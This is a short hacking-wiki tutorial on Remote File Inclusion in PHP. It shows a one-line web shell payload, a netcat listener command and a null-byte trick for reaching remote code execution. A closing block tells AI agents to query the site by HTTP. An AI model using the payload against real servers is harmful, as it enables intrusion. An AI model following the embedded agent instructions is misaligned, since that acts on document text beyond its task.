# RFI

RFI is possible in PHP when the <mark style="color:orange;">allow\_url</mark>*<mark style="color:orange;">\_</mark>*<mark style="color:orange;">include</mark> directive is set to <mark style="color:orange;">On</mark> within **php.ini**.

### Host an evil file via HTTP (apache2/python/etc):

{% tabs %}
{% tab title="evil.txt" %}

```php
<?php echo shell_exec("cmd");?>
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
Set up a listener for debugging: <mark style="color:green;">nc -lvnp 80</mark>
{% endhint %}

Call the file:

![](/files/-McqpHORJXBpEyPOu6NN)

This goes to our web server and grabs the evil file. We see is that it requests\
GET /evil.txt.php\
from our webserver so we just add a null byte %00 to the end of it to stop it from appending the php.\
\
Then it works and since it will be read by the php engine we have RCE:

![](/files/-McqpJEghMT4m1BJuJY9)

{% hint style="info" %}
Txt is used because if we were to use a .php extension then the file would actually run on the attacker machine.&#x20;
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.hackbook.io/web-application-hacking/web-techniques/file-and-resource-attacks/rfi.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.